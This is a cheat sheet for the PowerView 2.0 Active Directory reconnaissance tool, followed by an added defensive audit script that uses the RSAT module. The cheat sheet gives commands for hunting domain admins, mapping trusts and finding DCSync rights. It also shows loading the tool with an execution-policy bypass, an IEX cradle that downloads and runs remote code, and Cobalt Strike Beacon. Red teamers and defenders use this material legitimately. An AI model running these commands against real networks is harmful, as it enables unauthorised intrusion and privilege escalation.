PowerView PDF

The document is a cheat sheet for the PowerView 2.0 tool, which enumerates information about a domain through LDAP queries. It lists common commands for discovering computers, users, groups and group members on a domain, and describes the options for filtering results, writing output to files, and reflecting queries through a specific domain controller.

PowerView 2.0 Cheat Sheet

Getting Started

  Get PowerView: http://bit.ly/1pzQCnv

  Load from disk: 1) C:\> powershell -exec bypass  2) PS C:\> Import-Module powerview.ps1

  Load from GitHub: PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1pzQCnv")

  Run on non-domain joined machine: 1) configure DNS to point to the DC of the domain, 2) runas /netonly /user:DOMAIN\user powershell.exe

  Load in Cobalt Strike's Beacon: beacon> powershell-import /local/path/to/powerview.ps1, then beacon> powershell CMDLET-NAME

  Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]

  Most PowerView functions are implemented in Empire in situational_awareness/network/powerview/*

Filtering and Output

  Execute a command on each result object             … | %{ …Invoke-Command $_ }
  Filter result objects by field                      … | ? {$_.Field -eq X}
  Only return certain properties                      … | Select prop1,prop2
  Display output as a list                            … | fl
  Display output as wrapped table                     … | ft -wrap
  Write out to file                                   … | Out-File -Encoding Ascii out.txt
  Write to .csv                                       … | Export-CSV -NoTypeInformation out.csv
  Write to .xml object                                … | Export-Clixml obj.xml
  Read .xml object                                    $obj = Import-Clixml obj.xml

Common Cmdlet Options

  Display verbose status/debug information            -Verbose
  Add a 10 second delay between enumerating each      -Delay 10
    machine
  Execute a "meta" function with 15 threads           -Threads 15
  Pull information from a foreign domain. Otherwise   -Domain foreign.com
    functions default to the current domain.
  Reflect LDAP queries through a specific DC          -DomainController dc.domain.com
  Execute a command/search on/for a specified         -ComputerName SERVER.domain.com
    computer.

  Many "search" cmdlets (e.g. Invoke-UserHunter) also have additional common options:

  Don't ping machines before enumerating them         -NoPing
  File of computer names to enumerate                 -ComputerFile file.txt
  Enumerate computers found w/ specific LDAP filter   -ComputerFilter "(description=*web*)"
  Enumerate computers on a specific ADS path          -ComputerADSpath "LDAP://OU=secret,..."
    (e.g. in specific OUs)
  File of user names to search for                    -UserFile users.txt
  Search for users w/ specific LDAP filter            -UserFilter "(description=*web*)"
  Only search for users on a specific ADS path        -UserADSpath "LDAP://OU=secret, ..."

Computer Enumeration

  Get-NetComputer will enumerate computer objects on a given domain through LDAP, returning hostnames by default.

  Return only live hosts                              -Ping
  Full computer objects (not just hostnames)          -FullData
  Search w/ specific LDAP filter                      -Filter "(description=*web*)"
  Search specific domain ADS path (e.g. OUs)          -ADSpath "LDAP://OU=secret, ..."
  Machines with unconstrained delegation              -Unconstrained

Identifying Your Prey

  Get-NetGroup will enumerate group objects themselves on a given domain through LDAP.

  Return specific name results                        -GroupName *admin*
  Full group objects                                  -FullData
  (Nested) groups a specific user is a member of      -UserName USER

  Get-NetGroupMember will enumerate the members of a specific group on a given domain through LDAP.

  Specified group name                                -GroupName "Domain Admins"
  Full user objects                                   -FullData
  Recursively resolve the members of any results      -Recurse
    that are groups

  Get-NetUser will enumerate user objects on a given domain through LDAP.

  Return specific name results                        -UserName "*john*"
  Search w/ specific LDAP filter                      -Filter "(field=*term*)"
  Return users who are (or were) a member of an       -AdminCount
    admin protected group
  Users with a service principal name set (likely     -SPN
    service accounts)
  Search specific domain ADS path                     -ADSpath "LDAP://OU=secret, ..."

  Find-UserField will search a specified user field/property for a given term for all user objects through LDAP.

  Specify the field to search                         -SearchField description
  Term to search for                                  -SearchTerm term

User-Hunting

  Invoke-UserHunter will use LDAP queries and API calls to locate users on the domain. Note: default behavior searches for "Domain Admins" and touches every machine on the domain!

  Hunt for members of a specific group                -GroupName "Web Admins"
  Show all results (i.e. don't filter by user         -ShowAll
    targets)
  Hunt using only session information from file       -Stealth
    servers/DCs
  Hunt for users who are effective local admins for   -TargetServer SERVER.domain.com
    a given server
  Stop on first successful result found               -StopOnSuccess

Domain [Trusts]

  Info on the current domain                          Get-NetDomain
  Domain controllers for the current domain           Get-NetDomainController
  Info on the current forest                          Get-NetForest
  Enumerate all domains in the current forest         Get-NetForestDomain
  Get all forest trusts for the current forest        Get-NetForestTrust
  Get all domain trusts (à la nltest                  Get-NetDomainTrust
    /trusted_domains)
  Recursively map all domain trusts                   Invoke-MapDomainTrust
  Find users in groups outside of the given domain    Find-ForeignUser
    (outgoing access)
  Find groups w/ users outside of the given domain    Find-ForeignGroup -Domain target.domain.com
    (incoming access)
  Enumerate local administrators in groups not in     Invoke-EnumerateLocalAdmin -TrustGroup
    the given domain

Local Admin Enumeration

  Get-NetLocalGroup will enumerate the local users/groups from localhost or a remote machine.

  Enumerate local admins from hostname (or IP)        -ComputerName X
  List the local groups instead of group members      -ListGroups
  Use an alternate group besides local admins         -GroupName "Remote Desktop Users"
  Resolve any results that are groups, giving a set   -Recurse
    of effective users

Data Mining

  Invoke-ShareFinder will use LDAP queries and API calls to search for open shares on the domain. Note: default behavior touches every machine on the domain!

  Only return shares the current user can read        -CheckShareAccess

  Find-InterestingFile will recursively search a given local/UNC path for files matching specific criteria.

  Search a specific UNC path                          -Path \\SERVER\Share
  Only return files with the specified search terms   -Terms term1,term2,term3
    in their names.
  Only return office docs                             -OfficeDocs
  Only return files accessed within the last week.    -LastAccessTime (Get-Date).AddDays(-7)

Misc. Functions

  Search domain OUs                                   Get-NetOU
  Get all likely fileservers                          Get-NetFileServer
  Get shares for a specific machine                   Get-NetShare X.domain.com
  Get sessions for a specific machine                 Get-NetSession X.domain.com
  Get logged on users for a specific machine          Get-NetLoggedOn X.domain.com
  Get RDP sessions (and source IPs)                   Get-NetRDPSession X.domain.com
  Get (possibly) exploitable systems                  Get-ExploitableSystem

Power-One-Liners

  Take a GPP GUID and get all computers the local admin password is applied to:
    Get-NetOU -GUID {GPP_GUID} | %{ Get-NetComputer -ADSPath $_ }

  Find machines the current user has local admin access on:
    Find-LocalAdminAccess

  Get the default domain access policy:
    Get-DomainPolicy | Select -Expand SystemAccess

  See who can admin all domain controllers in the current domain:
    Get-NetDomainController | Get-NetLocalGroup

  See what objects have DCSync rights:
    Get-ObjectACL -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }

  Users with sidHistory set:
    Get-NetUser -Filter '(sidHistory=*)'

  Users with passwords > 1 year:
    $Date = (Get-Date).AddYears(-1).ToFileTime(); Get-NetUser -Filter "(pwdlastset<=$Date)"

  Search SYSVol for common scripts:
    Invoke-FileFinder -SearchSYSVol

More Information

  http://www.harmj0y.net/blog/tag/powerview/
  http://www.verisgroup.com/adaptive-threat-division/

Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
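The Power-One-Liners above (sidHistory, stale passwords, adminCount, SPN, unconstrained delegation) are also the conditions a domain administrator should audit before anyone else finds them. The following is an added example, not part of the cheat sheet and not PowerView code: it runs the same LDAP filters through the RSAT ActiveDirectory module so the check can be scheduled on a management host. The DC name dc.domain.com and the output file name are assumptions.

```powershell
# Added example (not from the cheat sheet): audit a domain for the conditions
# the Power-One-Liners look for, using the RSAT ActiveDirectory module.
# Assumes RSAT is installed and the caller has read access to the domain.
Import-Module ActiveDirectory

$server = 'dc.domain.com'   # assumed DC; plays the role of -DomainController

# pwdLastSet is a Windows FILETIME, so the cutoff is converted exactly as the
# cheat sheet does. pwdLastSet=0 means "never set / must change at next logon",
# which the one-liner also matches; it is excluded here so the report lists
# only accounts that really have an old password. Disabled accounts
# (userAccountControl bit 0x2) are excluded with the LDAP bitwise-AND rule.
$staleCutoff = (Get-Date).AddYears(-1).ToFileTime()
$enabled     = '(!(userAccountControl:1.2.840.113556.1.4.803:=2))'
$staleFilter = "(&(pwdLastSet<=$staleCutoff)(!(pwdLastSet=0))$enabled)"

# TRUSTED_FOR_DELEGATION is bit 0x80000 (524288) of userAccountControl;
# this is what Get-NetComputer -Unconstrained tests for.
$unconstrainedFilter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

$checks = [ordered]@{
    'sidHistory set'                 = @{ Cmd = 'Get-ADUser';     Filter = '(sidHistory=*)' }
    'password unchanged > 1 year'    = @{ Cmd = 'Get-ADUser';     Filter = $staleFilter }
    'adminCount=1 (admin-protected)' = @{ Cmd = 'Get-ADUser';     Filter = '(adminCount=1)' }
    'SPN set (likely service acct)'  = @{ Cmd = 'Get-ADUser';     Filter = '(servicePrincipalName=*)' }
    'unconstrained delegation'       = @{ Cmd = 'Get-ADComputer'; Filter = $unconstrainedFilter }
}

$findings = foreach ($name in $checks.Keys) {
    $c = $checks[$name]
    # Invoke the chosen cmdlet by name with the raw LDAP filter.
    & $c.Cmd -LDAPFilter $c.Filter -Server $server | ForEach-Object {
        [pscustomobject]@{
            Check             = $name
            SamAccountName    = $_.SamAccountName
            DistinguishedName = $_.DistinguishedName
        }
    }
}

$findings | Sort-Object Check, SamAccountName | Format-Table -AutoSize
# Same output conventions as the cheat sheet's Filtering and Output section.
$findings | Export-Csv -NoTypeInformation -Encoding ASCII ad-hygiene.csv   # assumed file name
```

Every hit in the adminCount and unconstrained-delegation rows is an object worth reviewing by hand: adminCount stays 1 after a user leaves a protected group, and unconstrained delegation on anything but a DC is rarely intended.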